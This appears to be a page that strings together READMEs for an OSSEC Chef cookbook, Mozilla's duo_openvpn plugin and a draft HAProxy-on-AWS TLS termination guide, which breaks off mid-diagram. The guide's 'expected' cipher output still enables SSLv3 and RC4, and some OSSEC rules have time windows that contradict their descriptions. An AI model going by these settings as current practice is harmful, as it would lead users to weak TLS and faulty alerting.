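The --map-min-conn behavior amounts to filtering the per-IP connection counts before mapping; a minimal sketch (the counts dict is illustrative, not real log data):

```python
def filter_by_connections(ip_counts, min_conn):
    """Keep only IPs that connected at least min_conn times."""
    return {ip: n for ip, n in ip_counts.items() if n >= min_conn}

counts = {"192.0.2.1": 7, "198.51.100.2": 2, "203.0.113.3": 5}
print(filter_by_connections(counts, 5))  # {'192.0.2.1': 7, '203.0.113.3': 5}
```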

More information can be found on:

AutOssec – Ossec cookbook for Chef, with secure & automated key management


  • Fully automated installation and configuration of ossec-servers and ossec-agents
  • Manages key generation and distribution between a server and multiple agents
  • Cleans queues on the server if needed (rid)


Ubuntu 10.04+ (should work with ossec systems if you have the packages)


General Attributes

The attributes below follow the same namespace syntax that OSSEC does. Refer to the official OSSEC Documentation for more information.

Default attributes from the cookbook:

default[:version] = "2.6"
default[:ossec][:syslog_output][:ip] = ""
default[:ossec][:syslog_output][:port] = "514"
default[:ossec][:syslog_output][:min_level] = "5"
default[:ossec][:receiver_port] = "1514"
default[:ossec][:log_alert_level] = "1"
default[:ossec][:email_alert_level] = "7"
default[:ossec][:agents] = {}

Default attributes from the ossec-server role:

:ossec => {
  :email_notification => 'yes',
  :email_to => [
  :email_from => '',
  :smtp_server => 'localhost',
  :white_list => [
  :email_alerts => {
    '' => {
      'level' => '9',
      'group' => 'syscheck',
      'event_location_tag' => 'reputation',
      'event_location_search' => 'roles:*mongodb*',
      'format' => 'sms',
      'rule_id' => '100001',
      'tags' => [
  :server => {
    :service_name => 'ossec-hids-server'
  :syscheck => {
    :frequency => '7200',
    :alert_new_files => 'yes',
    :auto_ignore => 'no',
    :directories => {
      '/bin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/sbin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/usr/bin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/usr/sbin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/etc' => {
        'report_changes' => 'yes',
        'realtime' => 'yes'
      '/tmp' => {
        'report_changes' => 'yes',
        'realtime' => 'no'
    :ignore => [
  :syslog_files => [

email_alerts is a hash of recipients and servers. Each recipient will receive all of the alerts for the listed location (the list is a regex). event_location_tag must contain a valid chef tag. All the nodes listed by that tag will generate a separate email_alerts rule. This is in addition to the default email_to list and is used to send alerts to specific recipients for a limited number of hosts only.

Local Rules Definitions

Rules are defined in Ruby Hash format and replicate the XML format of the regular OSSEC Rules Syntax. Each rule has a head, a body, tags and info (the last 2 being optional).

head=   <rule id="12345" level="12" frequency="45" timeframe="60">
body=     <description>Test Rule</description>
body=     <match>Big Error</match>
body=     <hostname>server1</hostname>
tags=     <same_source_ip />
tags=     <same_source_port />
info=     <info type="link"></info>

The sections below are parsed by the template. The following items are mandatory:

  • head/level
  • body/description
    :ossec =>
      :rules => {
        "100001" => {
          :head => {
            :level => "7",
            :maxsize => "65536",
            :frequency => "100",
            :timeframe => "3600",
            :ignore => "5",
            :overwrite => "68321"
          :body => {
            :hostname_search => "recipes:mms-agent",
            :description => "Super Security Rule for application XYZ",
            :match => "super dangerous error happened",
            :regex => "^\d+Hello World$",
            :decoded_as => "vsftpd",
            :category => "windows",
            :srcip => "",
            :dstip => "",
            :user => "bob",
            :program_name => "nginx",
            :time => "09:00-18:00",
            :weekday => "monday,tuesday",
            :id => "404",
            :url => "/changepassword.php",
            :if_sid => "100238",
            :if_group => "authentication_success",
            :if_level => "13",
            :if_matched_sid => "12037",
            :if_matched_group => "adduser",
            :if_matched_level => "7",
            :options => "no_email_alert",
            :check_diff => "true",
            :group => "syscheck"
          :tags => [
          :infos => {
            :link => "",
            :text => "the link above contains additional information"


With the exception of hostname_search, all attributes use the same syntax as the OSSEC rule in XML format. hostname_search in this cookbook represents a search query that is executed by the server recipe to populate <hostname> with the proper list of hosts, dynamically pulled from chef. Search criteria can be anything that a chef search can take. Example: recipe:mongodb\:\:replicaset and tags:reputation

Local Decoders Definitions

Decoders are defined in JSON format and replicate the XML format of regular OSSEC Decoder Syntax

:ossec => {
  :decoders => {
    'apache-errorlog' => {
      :program_name => '^httpd|^apache2',
      :prematch => {
        :parser => '^\S+ [\w+\s*\d+ \S+ \d+] [\S+] |^[warn] |^[notice] |^[error]'

    'apache-errorlog-ip-custom' => {
      :parent => 'apache-errorlog',
      :prematch => {
        :offset => 'after_parent',
        :parser => '^[client'
      :regex => {
        :offset => 'after_prematch',
        :parser => '^ (\d+.\d+.\d+.\d+)]'
      :order => 'srcip'
    'web-accesslog-custom' => {
      :parent => 'web-accesslog',
      :type => 'web-log',
      :prematch => {
        :parser => '^\d+.\d+.\d+.\d+ |^::ffff:\d+.\d+.\d+.\d+'
      :regex => {
        :parser => '^\d+.\d+.\d+.\d+ \S+ (\d+.\d+.\d+.\d+) \S+ \S+ \S+ [\S+ \S\d+] "\w+ (\S+) HTTP\S+ (\d+) \S+ "(\S+)"'
      :order => 'srcip, url, id, extra_data'

prematch and regex are hashes that can have an offset value and always have a parser value. See the ossec documentation for more information.

Local Syslog Files

If you want specific log files to be monitored on specific agents, you can use a local_syslog_files block in the agent node attributes. The apply_to parameter of this block is a Chef::Search() that will expand to a list of hosts. If the given agent belongs to the list of hosts, it will add the logfile to its local ossec configuration.

  :ossec => {
    local_syslog_files => {
      '/var/log/supervisor/supervisor.log' => {
        'apply_to' => 'supervisor:*',
        'log_format' => 'syslog'


  • recipe[ossec-server] should be a stand alone installation
  • recipe[ossec-agent] should be added (via role[ossec-agent]) to all the nodes of the environment

Example Roles


This role can be used to provision an ossec server:

name 'ossec-server'
description 'OSSEC Server'
  :ossec => {
    :agent => {
      :enable => false
  :ossec => {
    :email_notification => 'yes',
    :email_to => [
    :email_from => 'ossec-server',
    :smtp_server => 'localhost',
    :white_list => [
    :email_alerts => {
      '' => {
        'event_location_tag' => 'project1',
      '' => {
        'event_location_tag' => 'project1',
        'group' => 'developers',
      '' => {
        'event_location_tag' => 'project2',
        'group' => 'developers',
      '' => {
        'event_location_search' => 'tags:project1 OR tags:project2 OR tags:project3',
        'group' => 'developers',
      '' => {
        'event_location_search' => 'roles:application-server AND roles:python-django',
        'group' => 'frontend-group',
    :decoders => {
      1 => {
        :name => 'apache-errorlog',
        :program_name => '^httpd|^apache2',
        :prematch => {
          :parser => '^\S+ [\w+\s*\d+ \S+ \d+] [\S+] |^[warn] |^[notice] |^[error]'

      2 => {
        :name => 'apache-errorlog-ip-custom',
        :parent => 'apache-errorlog',
        :prematch => {
          :offset => 'after_parent',
          :parser => '^[client'
        :regex => {
          :offset => 'after_prematch',
          :parser => '^ (\d+.\d+.\d+.\d+)]'
        :order => 'srcip'
      3 => {
        :name => 'web-accesslog-custom',
        :parent => 'web-accesslog',
        :type => 'web-log',
        :prematch => {
          :parser => '^\d+.\d+.\d+.\d+ |^::ffff:\d+.\d+.\d+.\d+'
        :regex => {
          :parser => '^\d+.\d+.\d+.\d+ \S+ (\d+.\d+.\d+.\d+) \S+ \S+ \S+ [\S+ \S\d+] "\w+ (\S+) HTTP\S+ (\d+) \S+ "(\S+)"'
        :order => 'srcip, url, id, extra_data'
    :rules => {
      1002 => {
        :head => {
          :level => '2',
          :overwrite => 'yes'
        :body => {
          :description => 'Unknown problem somewhere in the system.',
          :match => 'core_dumped|failure|error|Error|attack|bad |illegal |denied|refused|unauthorized|fatal|fail|Segmentation Fault|Corrupted|Traceback|raise',
          :options => 'alert_by_email'
      1003 => {
        :head => {
          :level => '6',
          :maxsize => '16384',
          :overwrite => 'yes'
        :body => {
          :description => 'Non standard syslog message (larger than 16kB).'
      100003 => {
        :head => {
          :level => '10'
        :body => {
          :description => 'Successful sudo during non-business hours 6pm to 8am',
          :if_sid => '5402,5403',
          :time => '10pm - 12am'
      100004 => {
        :head => {
          :level => '10'
        :body => {
          :description => 'Successful sudo during weekend.',
          :if_sid => '5402,5403',
          :weekday => 'weekends'
      100005 => {
        :head => {
          :level => '0'
        :body => {
          :description => 'Silencing sudo errors from accounts allowed to sudo anytime',
          :if_sid => '100004,100005',
          :match => 'nagios'
      100006 => {
        :head => {
          :level => '0'
        :body => {
          :description => 'Silencing ossec agent stop/start during business hours 8am to 6pm',
          :if_sid => '502,503,504',
          :time => '12:00-22:00',
          :weekday => 'monday,tuesday,wednesday,thursday,friday'
      100007 => {
        :head => {
          :level => '8'
        :body => {
          :description => 'Login outside of business hours 6pm to 8am',
          :if_sid => '5501',
          :time => '22:00-12:00'
      100008 => {
        :head => {
          :level => '8'
        :body => {
          :description => 'Login during weekend.',
          :if_sid => '5501',
          :weekday => 'weekends'
      100009 => {
        :head => {
          :level => '0'
        :body => {
          :description => 'Ignore logins alerts for systems accounts',
          :if_sid => '100007,100008',
          :match => 'ubuntu|nagios'


This role can be used to provision an ossec-agent

name "ossec-agent"
description "OSSEC Agent"
  :ossec => {
    :client => {
      :service_name => 'ossec-hids-client'
    :syscheck => {
      :frequency => '7200',
      :alert_new_files => 'yes',
      :auto_ignore => 'no',
      :directories => {
        '/bin' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
         '/boot' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/etc' => {
          'report_changes' => 'yes',
          'realtime' => 'no'
        '/lib/lsb' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/modules' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/plymouth' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/security' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/terminfo' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/ufw' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/xtables' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/media' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/opt' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/root' => {
          'report_changes' => 'yes',
          'realtime' => 'no'
        '/srv' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/sbin' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/usr/' => {
          'report_changes' => 'yes',
          'realtime' => 'yes'
        '/tmp' => {
          'report_changes' => 'no',
          'realtime' => 'no'
      :ignore => [
      :local_ignore => {
        '^/opt/graphite/storage/' => {
          'apply_to' => 'roles:graphite-server OR roles:statsd-server',
          'type' => 'sregex'
        '^/usr/lib/elasticsearch' => {
          'apply_to' => 'roles:elastic-search-cluster',
          'type' => 'sregex'
        '^/etc/chef/cache/checksums/' => {
          'apply_to' => 'roles:chef-client',
          'type' => 'sregex'
        '^/srv/rsyslog/' => {
          'apply_to' => 'roles:rsyslog-server',
          'type' => 'sregex'
        '^/etc/djbdns/public-dnscache/supervise/|^/etc/djbdns/tinydns-internal/supervise/|^/etc/djbdns/public-dnscache/log|^/etc/djbdns/tinydns-internal/log|^/etc/djbdns/tinydns-internal/root/data' => {
          'apply_to' => 'roles:djbdns-server',
          'type' => 'sregex'
    :syslog_files => [
    :local_syslog_files => {
      '/var/log/supervisor/supervisor.log' => {
        'apply_to' => 'supervisor:*',
        'log_format' => 'syslog'
      '/var/log/rabbitmq/rabbit1.log' => {
        'apply_to' => 'recipes:rabbitmq',
        'log_format' => 'multi-line:3'
      '/var/log/nginx/access.log' => {
        'apply_to' => 'nginx:*',
        'log_format' => 'syslog'
      '/var/log/nginx/error.log' => {
        'apply_to' => 'nginx:*',
        'log_format' => 'syslog'
      '/var/log/nagios3/nagios.log' => {
        'apply_to' => 'roles:nagios-server',
        'log_format' => 'syslog'
      '/var/log/nagios3/apache_access.log' => {
        'apply_to' => 'roles:nagios-server',
        'log_format' => 'syslog'
      '/var/log/nagios3/apache_error.log' => {
        'apply_to' => 'roles:nagios-server',
        'log_format' => 'syslog'

More information can be found on:

Mozilla’s take on duo_openvpn


Our own take on duo_openvpn support. Not very happy with the provided duo_openvpn support, we rewrote it to use duo_client_python, which is much nicer.

Git submodules

In order to checkout all the modules necessary for this to build, run

git clone --recursive
# Or, if already checked out:
git submodule update --init --recursive


  • Simple. Sort of. The LDAP features are a little more complex – if you don’t use them, it’s fairly simple.
  • Auth caching per login+ip address.
  • Fail open (optional).
  • OTP and Push (use push as password for push, passcode:123456 as password for OTP, where 123456 is your OTP).
  • CEF support.
  • MozDef support.
  • Optional username hack, in case you use emails as certificate CN but only the first part of the email as login.
  • Supports logging in with LDAP alongside, or instead of, Duo.
  • Deferred call.


C plugin

Call it from openvpn configuration with:

plugin /usr/lib/openvpn/plugins/ /usr/lib/openvpn/plugins/

This allows making a deferred call for authentication from a script instead of blocking OpenVPN. This is needed because Duo would otherwise block OpenVPN while waiting for a push reply or OTP input.

Python script

Look at and rename/copy it to duo_openvpn.conf (or /etc/duo_openvpn.conf). Here are some examples & help:

TRY_LDAP_ONLY_AUTH_FIRST=False: Try to auth LDAP first, if succeeds, bypass DuoSec.

LDAP_URL=”ldap://”: Needed for any LDAP operation, else leave empty.
LDAP_BIND_DN=’mail=%s,o=com,dc=mozilla’: The bind dn for the user auth. %s is replaced by the username.
LDAP_BASE_DN=’dc=mozilla’: The base dn to find the user to auth in.

LDAP control values are mainly used to filter on a group that has DuoSecurity enabled. If you’re in that group, you get DuoSec; else, you get LDAP auth. Basically, we look up the user’s uid from his email (as we’re passed an email as common_name). If the uid == the email, that’s fine too. Then, we look up an attribute in LDAP, and we check that one of the attribute’s values == the uid. Looks like this: User:,o=com,dc=mozilla => uid = hi Attributes: {‘posix_sysadmins’: {‘memberUid’: “user1”, “hi”, “user2, … }}

Bind to that user for attribute checks.
LDAP_CONTROL_PASSWORD=””: The password for the above user.
LDAP_CONTROL_BASE_DN=”ou=groups,dc=mozilla”: The base DN for the above attribute search.
LDAP_DUOSEC_ATTR_VALUE=”cn=posix_sysadmins”: Will look for that attribute, when checking for DuoSecurity users.
LDAP_DUOSEC_ATTR=”memberUid”: Will look for that value in the attribute.

Misc scripts

The /scripts directory contains additional goodies.


If you use reneg-sec 0 so that OpenVPN does not renegotiate (or renegotiates very rarely, should you use a setting other than 0 that is still very high), you might still want to automatically disconnect users that you have disabled in LDAP.

Run this in a crontab periodically; it will poll for the users and kill them.
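A cron entry could look like the following; the script path and the 15-minute interval are hypothetical placeholders, since the actual script name lives in the /scripts directory:

```
*/15 * * * * root /etc/openvpn/scripts/disconnect_disabled_ldap_users.sh
```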

Recommended openvpn server settings:

management /var/run/openvpn-udp-stage.socket unix
management-client-group vpnmgmt


  • use mozlibldap for the duo script

More information can be found on:

Documentation on building a HTTPS stack in AWS with HAProxy

Guidelines for HAProxy termination in AWS

Document status

Status: NOT READY $Revision: $ @ 2015-04-17 09:04 PDT
Author: Julien Vehent. Review: CloudOps

Table of contents

  • 1   Summary & Scope
  • 2   Architecture
  • 3   PROXY protocol between ELB and HAProxy
    • 3.1   ELB Configuration
    • 3.2   HAProxy frontend
    • 3.3   SSL/TLS Configuration
    • 3.4   Healthchecks between ELB and HAProxy
  • 4   ELB Logging
  • 5   HAProxy Logging
    • 5.1   Unique request ID
    • 5.2   Capturing headers and cookies
    • 5.3   Logging in a separate frontend
  • 6   Rate limiting & DDoS protection
    • 6.1   Automated rate limiting
    • 6.2   Querying tables state in real time
    • 6.3   Blacklists & Whitelists
    • 6.4   Protect against slow clients (Slowloris attack)
  • 7   URL filtering with ACLs
    • 7.1   Filtering URL parameters on GET requests
    • 7.2   Filtering payloads on POST requests
    • 7.3   Marking instead of blocking
  • 8   HAProxy management
    • 8.1   Enabling the stat socket
    • 8.2   Collecting statistics
    • 8.3   Analyzing errors
    • 8.4   Parsing performance metrics from the logs
    • 8.5   Soft reload
  • 9   Full HAProxy configuration
  • 10   Building process
    • 10.1   Static build
    • 10.2   Dynamic build
    • 10.3   RPM build

1   Summary & Scope

This document explains how HAProxy and Elastic Load Balancer can be used in Amazon Web Services to provide performant and secure termination of traffic to an API service. The goal is to provide the following features:

  • DDoS Protection: we use HAProxy to mitigate low to medium DDoS attacks, with sane limits and custom blacklist.
  • Application firewall: we perform a first level of filtering in HAProxy that protects NodeJS against all sorts of attacks, known and to come. This is done by inserting a set of regexes in HAProxy ACLs that get updated when the application routes are updated. Note that managing these ACLs will not impact uptime or require redeployment.
  • SSL/TLS: ELBs support the PROXY protocol, and so does HAProxy, which allows us to proxy the tcp connection to HAProxy. It gives us better TLS, backed by OpenSSL, at the cost of managing the TLS keys on the HAProxy instances.
  • Logging: ELBs have limited support for logging. HAProxy, however, has excellent logging for TCP, SSL and HTTPS. We leverage the flexibility of HAProxy’s logging to improve our DDoS detection capabilities. We also want to uniquely identify requests in HAProxy and NodeJS, and correlate events, using a unique-id.

2   Architecture

Below is our target setup:

architecture diagram

3   PROXY protocol between ELB and HAProxy

This configuration uses an Elastic Load Balancer in TCP mode, with PROXY protocol enabled. The PROXY protocol adds a string at the beginning of the TCP payload that is passed to the backend. This string contains the IP of the client that connected to the ELB, which allows HAProxy to feed its internal state with this information, and act as if it had a direct TCP connection to the client.
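For illustration, a PROXY protocol v1 header is a single human-readable line prepended to the connection. A minimal Python sketch of parsing one (the sample addresses are illustrative, and HAProxy does this natively via accept-proxy):

```python
def parse_proxy_v1(line):
    """Parse a PROXY protocol v1 header of the form
    'PROXY TCP4 <srcip> <dstip> <srcport> <dstport>\\r\\n'."""
    parts = line.strip().split()
    if not parts or parts[0] != "PROXY":
        raise ValueError("not a PROXY protocol header")
    return {"proto": parts[1], "src": parts[2], "dst": parts[3],
            "sport": int(parts[4]), "dport": int(parts[5])}

hdr = "PROXY TCP4 198.51.100.10 203.0.113.5 34567 443\r\n"
print(parse_proxy_v1(hdr)["src"])  # 198.51.100.10
```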

For more information on the PROXY protocol, see

First, we need to create an ELB, and enable a TCP listener on port 443 that supports the PROXY protocol. The ELB will not decipher the SSL, but instead pass the entire TCP payload down to HAProxy.

3.1   ELB Configuration

PROXY protocol support must be enabled on the ELB.

$ ./elb-describe-lb-policy-types -I AKIA... -S Ww1... --region us-east-1
POLICY_TYPE  ProxyProtocolPolicyType    Policy that controls whether to include the
                                        IP address and port of the originating request
                                        for TCP messages. This policy operates on
                                        TCP/SSL listeners only

The policy name we want to enable is ProxyProtocolPolicyType. We need the load balancer name for that, and the following command:

$ ./elb-create-lb-policy elb123-testproxyprotocol \
--policy-name EnableProxyProtocol \
--policy-type ProxyProtocolPolicyType \
--attribute "name=ProxyProtocol, value=true" \
-I AKIA... -S Ww1... --region us-east-1

OK-Creating LoadBalancer Policy

$ ./elb-set-lb-policies-for-backend-server elb123-testproxyprotocol \
--policy-names EnableProxyProtocol \
--instance-port 443 \
-I AKIA... -S Ww1... --region us-east-1

OK-Setting Policies

Now configure a listener on TCP/443 on that ELB, that points to TCP/443 on the HAProxy instance. On the instance side, make sure that your security group accepts traffic from the ELB security group on port 443.

3.2   HAProxy frontend

The HAProxy frontend listens on port 443 with a SSL configuration, as follows:

frontend https
        bind accept-proxy ssl ......

Note the accept-proxy parameter of the bind command. This option tells HAProxy that whatever sits in front of it will prepend the PROXY header to the TCP payload.
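Putting the pieces together, a complete bind line might look like the sketch below. The certificate path and ciphersuite are illustrative placeholders, not the values used in this deployment:

frontend https
        bind 0.0.0.0:443 accept-proxy ssl crt /etc/haproxy/bundle.pem ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:!aNULL:!MD5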

3.3   SSL/TLS Configuration

HAProxy takes a SSL configuration on the bind line directly. The configuration requires a set of certificates and private key, and a ciphersuite.


Unlike most servers (Apache, Nginx, …), HAProxy expects certificates and keys in a single file, here named bundle.pem. In this file are concatenated the server private key, the server public certificate, the CA intermediate certificate (if any) and a DH parameter (if any).

In the sample below, components of bundle.pem are concatenated as follows:

  • server certificate signed by CA XYZ
  • server private key
  • public DH parameter (2048 bits)
  • intermediate certificate of CA XYZ
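Assembling the bundle is a simple concatenation, in the order listed above. A sketch, where the file names are illustrative placeholders for your own certificate material:

```shell
# Concatenate the components into the single file HAProxy expects.
# File names are placeholders; adjust to your own paths.
cat server.crt server.key dhparam.pem intermediate.pem > bundle.pem
```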

The rest of the bind line specifies a ciphersuite.

We can verify the configuration using cipherscan. Below is the expected output for our configuration:

$ ./cipherscan
prio  ciphersuite                  protocols                    pfs_keysize
1     ECDHE-RSA-AES128-GCM-SHA256  SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
2     ECDHE-RSA-AES256-GCM-SHA384  SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
3     DHE-RSA-AES128-GCM-SHA256    SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
4     DHE-RSA-AES256-GCM-SHA384    SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
5     ECDHE-RSA-AES128-SHA256      SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
6     ECDHE-RSA-AES128-SHA         SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
7     ECDHE-RSA-AES256-SHA384      SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
8     ECDHE-RSA-AES256-SHA         SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
9     DHE-RSA-AES128-SHA256        SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
10    DHE-RSA-AES128-SHA           SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
11    DHE-RSA-AES256-SHA256        SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
12    DHE-RSA-AES256-SHA           SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
13    AES128-GCM-SHA256            SSLv3,TLSv1,TLSv1.1,TLSv1.2
14    AES256-GCM-SHA384            SSLv3,TLSv1,TLSv1.1,TLSv1.2
15    ECDHE-RSA-RC4-SHA            SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
16    AES128-SHA256                SSLv3,TLSv1,TLSv1.1,TLSv1.2
17    AES128-SHA                   SSLv3,TLSv1,TLSv1.1,TLSv1.2
18    AES256-SHA256                SSLv3,TLSv1,TLSv1.1,TLSv1.2
19    AES256-SHA                   SSLv3,TLSv1,TLSv1.1,TLSv1.2
20    RC4-SHA                      SSLv3,TLSv1,TLSv1.1,TLSv1.2
21    DHE-RSA-CAMELLIA256-SHA      SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
22    CAMELLIA256-SHA              SSLv3,TLSv1,TLSv1.1,TLSv1.2
23    DHE-RSA-CAMELLIA128-SHA      SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
24    CAMELLIA128-SHA              SSLv3,TLSv1,TLSv1.1,TLSv1.2

3.4   Healthchecks between ELB and HAProxy

At the time of writing, it appears that ELBs do not use the PROXY protocol when running healthchecks against an instance. As a result, these healthchecks cannot be handled by the https frontend, because HAProxy will fail when looking for a PROXY header that isn't there.

The workaround is to create a secondary frontend in HAProxy that is entirely dedicated to answering healthchecks from the ELB.

The configuration below uses the monitor option to check the health of the nodejs backend. If at least one server is alive in that backend, our health frontend will return 200 OK. If no server is alive, a 503 will be returned. All the ELB has to do is query the URL at http://haproxy_host:34180/haproxy_status . To reduce overhead, we also disable SSL on the health frontend.

# frontend used to return health status without requiring SSL
frontend health
        bind      # 34180 means EALTH ;)
        # create a status URI in /haproxy_status that will return
        # a 200 if the backend is healthy, and a 503 if it isn't.
        # This URI is queried by the ELB.
        acl backend_dead nbsrv(nodejs) lt 1
        monitor-uri /haproxy_status
        monitor fail if backend_dead

(note: we could also use ACLs in HAProxy to only expect the PROXY header on certain source IPs, but the approach of a dedicated health frontend seems cleaner)

4   ELB Logging


5   HAProxy Logging

HAProxy supports a custom log format, which we use here instead of the default log format, in order to capture TCP, SSL and HTTP information on a single line.

For our logging, we want the following:

  1. TCP/IP logs first, such that these are always present, even if HAProxy cuts the connection before processing the SSL or HTTP traffic
  2. SSL information
  3. HTTP information
log-format [%pid]\ [%Ts.%ms]\ %ac/%fc/%bc/%bq/%sc/%sq/%rc\ %Tq/%Tw/%Tc/%Tr/%Tt\ %tsc\ %ci:%cp\ %fi:%fp\ %si:%sp\ %ft\ %sslc\ %sslv\ %{+Q}r\ %ST\ %b:%s\ "%CC"\ "%hr"\ "%CS"\ "%hs"\ req_size=%U\ resp_size=%B

The format above will generate:

Mar 14 17:14:51 localhost haproxy[14887]: [14887] [1394817291.250] 10/5/2/0/3/0/0 48/0/0/624/672 ---- logger - - "GET /v1/ HTTP/1.0" 404 fxa-nodejs:nodejs1 "-" "{||ApacheBench/2.3|over-100-active-connections,over-100-connections-in-10-seconds,high-error-rate,high-request-rate,|47B4176E:8B75_0A977AE4:01BB_5323390B_31E0:3A27}" "-" "" req_size=592 resp_size=787

The log-format contains very detailed information, not only on the connection itself, but also on the state of HAProxy. Below is a description of the fields used in our custom log format.

  • %pid: process ID of HAProxy
  • %Ts.%ms: unix timestamp + milliseconds
  • %ac: total number of concurrent connections
  • %fc: total number of concurrent connections on the frontend
  • %bc: total number of concurrent connections on the backend
  • %bq: queue size of the backend
  • %sc: total number of concurrent connections on the server
  • %sq: queue size of the server
  • %rc: connection retries to the server
  • %Tq: total time to get the client request (HTTP mode only)
  • %Tw: total time spent in the queues waiting for a connection slot
  • %Tc: total time to establish the TCP connection to the server
  • %Tr: server response time (HTTP mode only)
  • %Tt: total session duration time, between the moment the proxy accepted it and the moment both ends were closed.
  • %tsc: termination state (see 8.5. Session state at disconnection)
  • %ci:%cp: client IP and Port
  • %fi:%fp: frontend IP and Port
  • %si:%sp: server IP and Port
  • %ft: transport type of the frontend (with a ~ suffix for SSL)
  • %sslc %sslv: SSL cipher and version
  • %{+Q}r: HTTP request, between double quotes
  • %ST: HTTP status code
  • %b:%s: backend name and server name
  • %CC: captured request cookies
  • %hr: captured request headers
  • %CS: captured response cookies
  • %hs: captured response headers
  • %U: bytes read from the client (request size)
  • %B: bytes read from server to client (response size)

For more details on the available logging variables, see the HAProxy configuration, under 8.2.4. Custom log format.
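The custom format can also be sanity-checked offline: since fields are space-separated, a quick awk one-liner pulls out, say, the HTTP status code and the request path from a sample line. Field positions below are specific to this exact log-format string, so treat this as a sketch:

```shell
# Extract the HTTP status ($17) and request path ($15) from a sample
# log line produced by the custom log-format above.
line='Mar 14 17:14:51 localhost haproxy[14887]: [14887] [1394817291.250] 10/5/2/0/3/0/0 48/0/0/624/672 ---- logger - - "GET /v1/ HTTP/1.0" 404 fxa-nodejs:nodejs1 "-" "{||ApacheBench/2.3|high-error-rate,|47B4176E:8B75_0A977AE4:01BB_5323390B_31E0:3A27}" "-" "" req_size=592 resp_size=787'
printf '%s\n' "$line" | awk '{print $17, $15}'
# prints: 404 /v1/
```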

5.1   Unique request ID

Tracking requests across multiple servers can be problematic, because the events triggered by a request on the frontend are not tied to each other. HAProxy has a simple mechanism to insert a unique identifier into incoming requests, in the form of an ID inserted in the request headers and passed to the backend server. This ID can then be logged by the backend server, and passed on to the next step. In a largely distributed environment, the unique ID makes tracking request propagation a lot easier.

The unique ID is declared on the HTTPS frontend as follow:

# Insert a unique request identifier in the headers of the request
# passed to the backend
unique-id-format %{+X}o\ %ci:%cp_%fi:%fp_%Ts_%rt:%pid
unique-id-header X-Unique-ID

This will add an ID that is composed of hexadecimal variables, taken from the client IP and port, frontend IP and port, timestamp, request counter and PID. An example of generated ID is 485B7525:CB2F_0A977AE4:01BB_5319CB0C_000D:27C0.
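To illustrate the encoding, the components of such an ID can be decoded back with a few lines of bash (the ID below is the example from above; the snippet requires bash for the substring expansions):

```shell
#!/usr/bin/env bash
# Decode the client IP:port from the hex-encoded unique-id.
id="485B7525:CB2F_0A977AE4:01BB_5319CB0C_000D:27C0"
client="${id%%_*}"        # client part: 485B7525:CB2F
ip_hex="${client%%:*}"    # 485B7525
port_hex="${client##*:}"  # CB2F
printf '%d.%d.%d.%d:%d\n' \
  "0x${ip_hex:0:2}" "0x${ip_hex:2:2}" "0x${ip_hex:4:2}" "0x${ip_hex:6:2}" \
  "0x${port_hex}"
# prints: 72.91.117.37:52015
```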

The Unique ID is added to the request headers passed to the backend in the X-Unique-ID header. We will also capture it in the logs, as a request header.

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cache-Control: max-age=0
X-Unique-ID: 485B7525:CB70_0A977AE4:01BB_5319CD3F_0163:27C0

5.2   Capturing headers and cookies

In the log format, we defined fields for the request and response headers and cookies. By default, however, these fields will show up empty in the logs. In order to log headers and cookies, the capture parameters must be set in the frontend.

Here is how we can capture headers sent by the client in the HTTP request.

capture request header Referrer len 64
capture request header Content-Length len 10
capture request header User-Agent len 64

Cookies can be captured the same way:

capture cookie mycookie123=  len 32

HAProxy will also add custom headers to the request, before passing it to the backend. However, added headers don’t get logged, because the addition happens after the capture operation. To fix this issue, we are going to create a new frontend dedicated to logging.

5.3   Logging in a separate frontend

During processing of the request, we added custom headers, and we want these headers to appear in the logs. One solution is to route all requests to a secondary frontend that only handles logging, and then blocks or forwards them.

Classic setup:

 request        +--------------+       +---------------+
+-------------->|frontend      |+----->|backend        |      +---------+
                |   fxa-https  |       |    fxa-nodejs |+---->|         |
                +--------------+       +---------------+      | NodeJS  |
                                                              |         |

Setup with separate logging frontend:

                {no logging}
 request        +--------------+       +---------------+
+-------------->|frontend      |       |backend        |      +---------+
                |   fxa-https  |       |    fxa-nodejs |+---->|         |
                +--------------+       +---------------+      | NodeJS  |
                       +                     ^                |         |
                       |                     |                +---------+
                       |                     |
